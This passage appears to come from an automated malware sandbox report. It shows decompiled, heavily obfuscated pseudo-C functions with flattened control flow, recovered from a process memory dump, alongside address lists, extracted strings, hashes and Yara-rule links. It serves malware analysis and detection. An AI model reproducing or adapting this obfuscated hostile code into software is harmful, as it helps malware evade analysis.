				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00232833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0024337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002493A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0024889D(0x24c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00237AB1(_v168, _a16, 0x24c000, 0x24c000, _v152 | _v176, _v100, 0x24c000, 0x24c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00242025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x0023bb44
0x0023bb4d
0x0023bb4e
0x0023bb55
0x0023bb5c
0x0023bb63
0x0023bb6a
0x0023bb6b
0x0023bb6c
0x0023bb6d
0x0023bb72
0x0023bb79
0x0023bb7b
0x0023bb83
0x0023bb86
0x0023bb92
0x0023bb99
0x0023bb9c
0x0023bba0
0x0023bba8
0x0023bbb0
0x0023bbb8
0x0023bbc0
0x0023bbc5
0x0023bbcd
0x0023bbd5
0x0023bbdd
0x0023bbe2
0x0023bbea
0x0023bbf2
0x0023bbfa
0x0023bc02
0x0023bc0a
0x0023bc12
0x0023bc17
0x0023bc1c
0x0023bc24
0x0023bc2c
0x0023bc34
0x0023bc44
0x0023bc48
0x0023bc50
0x0023bc58
0x0023bc60
0x0023bc68
0x0023bc70
0x0023bc7d
0x0023bc80
0x0023bc8c
0x0023bc90
0x0023bc98
0x0023bcab
0x0023bcac
0x0023bcb3
0x0023bcbe
0x0023bcc6
0x0023bcd1
0x0023bcd5
0x0023bcdd
0x0023bce5
0x0023bced
0x0023bcf2
0x0023bcfc
0x0023bd04
0x0023bd08
0x0023bd17
0x0023bd1a
0x0023bd1e
0x0023bd26
0x0023bd2e
0x0023bd36
0x0023bd3e
0x0023bd43
0x0023bd47
0x0023bd4f
0x0023bd57
0x0023bd61
0x0023bd65
0x0023bd6d
0x0023bd78
0x0023bd83
0x0023bd8e
0x0023bd96
0x0023bd9b
0x0023bda3
0x0023bdab
0x0023bdb3
0x0023bdc0
0x0023bdc4
0x0023bdc9
0x0023bdd1
0x0023bdd9
0x0023bde1
0x0023bde6
0x0023bdee
0x0023bdf6
0x0023be03
0x0023be0f
0x0023be13
0x0023be1b
0x0023be23
0x0023be28
0x0023be30
0x0023be38
0x0023be44
0x0023be49
0x0023be4f
0x0023be57
0x0023be5f
0x0023be67
0x0023be6f
0x0023be77
0x0023be7f
0x0023be87
0x0023be8f
0x0023be97
0x0023be9f
0x0023bea4
0x0023beaa
0x0023beb2
0x0023beba
0x0023bec6
0x0023bec9
0x0023bed2
0x0023bedf
0x0023beec
0x0023bef4
0x0023befc
0x0023bf04
0x0023bf0c
0x0023bf11
0x0023bf19
0x0023bf21
0x0023bf29
0x0023bf31
0x0023bf39
0x0023bf3e
0x0023bf46
0x0023bf53
0x0023bf57
0x0023bf5f
0x0023bf5f
0x0023bf65
0x0023bf9e
0x0023bfa3
0x0023bfa6
0x0023bfa8
0x0023bfae
0x00000000
0x0023bfae
0x0023bf67
0x0023bf69
0x0023c0b1
0x0023bf6f
0x0023bf75
0x00000000
0x0023bf7b
0x0023bf7b
0x00000000
0x0023bf7b
0x0023bf75
0x0023bf69
0x0023c0ba
0x0023c0c5
0x0023c0c5
0x0023bfcf
0x0023bfd4
0x0023bfe1
0x0023bff4
0x0023c054
0x0023c06b
0x0023c082
0x0023c087
0x0023c08a
0x0023c08c
0x0023c08c
0x0023c08c
0x00000000

Strings

f, xrefs: 0023BC1C
M}, xrefs: 0023BDC9
):, xrefs: 0023BEF4
t, xrefs: 0023BF21
t, xrefs: 0023BC48
l0, xrefs: 0023BEAA
tI, xrefs: 0023BC3C
25, xrefs: 0023BF04
.), xrefs: 0023BBB8
D, xrefs: 0023BFE1
AX, xrefs: 0023BD3E

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
Instruction ID: 472d332c45b494aa0fd804a7faceb257eaac6d3870ed1fc731aba12a1452282e
Opcode Fuzzy Hash: f9fe4e7595adbafd0c415ec7addbff66a690945b58ca593ded39d2991255ef24
Instruction Fuzzy Hash: 5ED102B15083819FE368CF65C889A1FFBE1BBC4758F10891DF29A96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00248F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00248F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002485BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00237B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0024889D(0x24c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x24ca2c; // 0x5d8300
						_t196 = _t282 + 0x230; // 0x7a0056
						E0023C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x24ca2c, _t245,  &_v520);
						_t238 = E00242025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0024889D(0x24c980, _v1088, __eflags);
					_t240 = E00248C8F(_v1056);
					_t258 =  *0x24ca2c; // 0x5d8300
					_t210 = _t258 + 0x230; // 0x5d8530
					E002329E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00242025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00248f49
0x00248f4f
0x00248f56
0x00248f5e
0x00248f66
0x00248f78
0x00248f7d
0x00248f83
0x00248f88
0x00248f8d
0x00248f95
0x00248f9d
0x00248fa5
0x00248fad
0x00248fb5
0x00248fc2
0x00248fca
0x00248fd2
0x00248fda
0x00248fe2
0x00248fea
0x00248fef
0x00248ff7
0x00248fff
0x0024900c
0x0024900d
0x00249011
0x00249019
0x0024901e
0x00249026
0x0024902e
0x00249038
0x0024903c
0x00249044
0x0024904c
0x0024905a
0x0024905e
0x00249066
0x0024906e
0x00249076
0x00249083
0x00249087
0x0024908f
0x00249097
0x0024909f
0x002490a9
0x002490ad
0x002490b5
0x002490bd
0x002490c5
0x002490cd
0x002490d5
0x002490dd
0x002490e5
0x002490ed
0x002490f5
0x002490fd
0x00249105
0x0024910a
0x00249112
0x0024911f
0x00249123
0x0024912b
0x00249133
0x0024913d
0x00249145
0x0024914a
0x00249155
0x0024915a
0x00249160
0x00249168
0x00249175
0x00249178
0x00249181
0x00249185
0x0024918a
0x00249192
0x0024919a
0x0024919f
0x002491a7
0x002491af
0x002491b7
0x002491bf
0x002491c7
0x002491d7
0x002491df
0x002491ef
0x002491f3
0x002491fb
0x00249203
0x0024920b
0x00249213
0x0024921b
0x00249223
0x0024922b
0x00249233
0x0024923b
0x00249247
0x0024924a
0x0024924e
0x00249256
0x00249262
0x00249276
0x00249276
0x00249280
0x0024938d
0x00249395
0x00000000
0x0024939c
0x0024928c
0x002492fc
0x00000000
0x002492fc
0x0024928e
0x00249290
0x00000000
0x00000000
0x00249296
0x002492a3
0x002492a8
0x002492c7
0x002492d4
0x002492da
0x002492ed
0x002492f2
0x002492f5
0x002492f5
0x00249303
0x00249310
0x0024931f
0x00249341
0x0024934d
0x00249353
0x00249369
0x0024936e
0x00249371
0x00249373
0x00249373
0x00249373
0x00000000

Strings

_r*, xrefs: 0024918A
m, xrefs: 00248FE2
E/, xrefs: 00248FCA
Cg+, xrefs: 00249267
kI, xrefs: 0024903C
aS, xrefs: 00249203
y, xrefs: 00249192
_r*, xrefs: 00249170, 0024917C
e, xrefs: 002490CD
;, xrefs: 002491D7

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
Instruction ID: e1ba25ea2e503b2212303459b9f38eeba743199c744c360f19c4bff692906f9e
Opcode Fuzzy Hash: 95cd7e87395356083014d7be14ec61461bbcc7f0e5331402cc79b4c18f156fa1
Instruction Fuzzy Hash: CAB1327151D3819FD358CF24C58A40BFBE1FBC8798F208A1DF595862A0D7B98A58CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00241773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00241773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00238736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002477A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002477A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x0024177a
0x0024177e
0x00241782
0x00241786
0x0024178a
0x0024178c
0x00241791
0x00241799
0x002417a3
0x002417a5
0x002417b6
0x002417b7
0x002417bb
0x002417c3
0x002417cb
0x002417d5
0x002417d9
0x002417de
0x002417e6
0x002417f9
0x002417fd
0x00241805
0x0024180d
0x00241815
0x0024181d
0x00241825
0x0024182d
0x00241832
0x0024183a
0x00241842
0x00241847
0x0024184f
0x00241857
0x0024185f
0x00241867
0x0024186f
0x00241877
0x0024187f
0x00241884
0x00241889
0x00241891
0x00241899
0x002418a1
0x002418a9
0x002418b1
0x002418b9
0x002418c1
0x002418c9
0x002418d1
0x002418d9
0x002418de
0x002418e6
0x002418ee
0x002418f6
0x002418fb
0x00241903
0x0024190b
0x00241913
0x00241918
0x00241920
0x00241928
0x0024192d
0x00241935
0x0024193d
0x00241945
0x0024194d
0x00241955
0x0024195d
0x0024195d
0x00241963
0x002419c0
0x002419c1
0x002419ca
0x002419d0
0x002419d2
0x00000000
0x002419d2
0x00241965
0x00241967
0x002419a0
0x002419a5
0x002419aa
0x002419ac
0x00000000
0x002419ac
0x00241969
0x0024196f
0x00000000
0x00241975
0x00241975
0x00000000
0x00241975
0x0024196f
0x00241967
0x00000000
0x00241963
0x002419fc
0x00241a01
0x00241a04
0x00241a09
0x00241a09
0x00241a16
0x00241a1e

Strings

uL, xrefs: 00241832
"y 2, xrefs: 00241847
(d, xrefs: 002418FB
x*", xrefs: 00241A04
~Y, xrefs: 00241877
rH, xrefs: 002418D1
"], xrefs: 002417C3
SQ, xrefs: 0024192D
x*", xrefs: 00241A09
5E, xrefs: 0024180D

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: 434dcaf6484d95d6b8429c07964260ddd04c56ef0452b2183bca049d8c4d874a
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: FF6121721093429FD358CF60C89982BFBE1BBD5788F104A1DF69696260C3B5CA58CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON

Download Yara Rule

APIs

StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
CoTaskMemAlloc.OLE32(?), ref: 10002782
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
CoTaskMemFree.OLE32(00000000), ref: 100027CC
CoTaskMemFree.OLE32(?), ref: 100027D6

Strings

o, xrefs: 10002741

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
String ID: o
API String ID: 207024522-3306556724
Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00242B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00242B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
